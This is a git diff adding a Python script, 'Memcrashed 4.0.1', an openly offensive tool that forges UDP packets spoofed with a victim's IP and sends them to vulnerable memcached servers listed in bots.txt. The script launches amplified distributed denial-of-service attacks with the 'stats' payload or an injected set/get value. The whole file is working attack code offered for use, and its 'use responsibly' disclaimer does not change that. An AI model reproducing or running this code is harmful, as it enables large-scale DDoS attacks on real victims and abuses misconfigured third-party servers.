649 · Nuzair46 · Apr 9, 2018
diff --git a/MemcrashedFree.py b/MemcrashedFree.py
@@ -0,0 +1,130 @@
+#-- coding: utf8 --
+#!/usr/bin/python
+import sys, os, time, shodan
+import logging
+logging.getLogger("scapy3k.runtime").setLevel(logging.ERROR) ##removes the ipv6 warning
+from pathlib import Path
+from scapy3k.all import * ##please change it to from scapy.all import *    if giving error
+from contextlib import contextmanager
+
+starttime=time.time()
+
+@contextmanager
+def suppress_stdout():
+    with open(os.devnull, "w") as devnull:
+        old_stdout = sys.stdout
+        sys.stdout = devnull
+        try:  
+            yield
+        finally:
+            sys.stdout = old_stdout
+
+class color:
+    HEADER = '\033[0m'
+
+keys = Path("./api.txt")
+logo = color.HEADER + '''
+
+   ███╗   ███╗███████╗███╗   ███╗ ██████╗██████╗  █████╗ ███████╗██╗  ██╗███████╗██████╗ 
+   ████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║  ██║██╔════╝██╔══██╗
+   ██╔████╔██║█████╗  ██╔████╔██║██║     ██████╔╝███████║███████╗███████║█████╗  ██║  ██║
+   ██║╚██╔╝██║██╔══╝  ██║╚██╔╝██║██║     ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝  ██║  ██║
+   ██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║  ██║██║  ██║███████║██║  ██║███████╗██████╔╝
+   ╚═╝     ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
+
+                                        Author: @037
+					Edited: Nuzer-Rednek
+                                        Version: 4.0.1
+
+####################################### DISCLAIMER ################################################
+| Memcrashed 4.0.1 is a tool that allows you to use Shodan.io's amp server list filtered without  |
+| having a paid account to obtain hundreds of vulnerable memcached servers, provided with already |
+| existing bots.txt with ip list. It then allows you to use the same servers to launch widespread |
+| distributed denial of service attacks by forging UDP packets sourced to your victim.            |
+| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply         |
+| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly.           |
+| I am NOT responsible for any damages caused or any crimes committed by using this tool.         |
+###################################################################################################
+
+'''
+print(logo)
+while True:
+    print('')
+    try:
+        myresults = Path("./bots.txt") ##removed api entry and api check
+        query = 'y'
+        saveme = 'y'
+        if myresults.is_file():
+            if saveme.startswith('y'):
+                ip_arrayn = []
+                with open('bots.txt') as my_file:         ##uses pre-saved bots.txt
+                    for line in my_file:
+                        ip_arrayn.append(line)
+                ip_array = [s.rstrip() for s in ip_arrayn]
+        else:
+            print('')
+            print('[✘] Error: No bots stored locally, bots.txt file not found!')
+            print('')
+        if saveme.startswith('y') or query.startswith('y'):
+            print('')
+            target = input("[▸] Enter target IP address: ")
+            targetport = input("[▸] Enter target port number (Default 80): ") or "80"
+            power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
+            print('')
+            data = input("[+] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
+            if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"):
+                dataset = "set injected 0 3600 ", len(data)+1, "\r\n", data, "\r\n get injected\r\n"
+                setdata = ("\x00\x00\x00\x00\x00\x00\x00\x00set\x00injected\x000\x003600\x00%s\r\n%s\r\n" % (len(data)+1, data))
+                getdata = ("\x00\x00\x00\x00\x00\x00\x00\x00get\x00injected\r\n")
+                print("[+] Payload transformed: ", dataset)
+            print('')
+            ##removed show bots list
+            engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower()
+            if engage.startswith('y'):
+                if saveme.startswith('y'):
+                    for i in ip_array:
+                        if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"):
+                            print('[+] Sending 2 forged synchronized payloads to: %s' % (i))
+                            with suppress_stdout():
+                                send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
+                                send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power)
+                        else:
+                            if power>1:
+                                print('[+] Sending %d forged UDP packets to: %s' % (power, i))
+                                with suppress_stdout():
+                                    send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
+                            elif power==1:
+                                print('[+] Sending 1 forged UDP packet to: %s' % i)
+                                with suppress_stdout():
+                                    send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
+                else:
+                    for result in results['matches']:
+                        if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"):
+                            print('[+] Sending 2 forged synchronized payloads to: %s' % (i))
+                            with suppress_stdout():
+                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
+                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power)
+                        else:
+                            if power>1:
+                                print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
+                                with suppress_stdout():
+                                    send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
+                            elif power==1:
+                                print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])
+                                with suppress_stdout():
+                                    send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
+                print('')
+                print('[•] Task complete! Exiting Platform. Have a wonderful day.')
+                break
+            else:
+                print('')
+                print('[✘] Error: %s not engaged!' % target)
+                print('[~] Restarting Platform! Please wait.')
+                print('')
+        else:
+            print('')
+            print('[✘] Error: No bots stored locally')
+            print('[~] Restarting Platform! Please wait.')
+            print('')
+    except shodan.APIError as e:
+            print('[x] Exiting')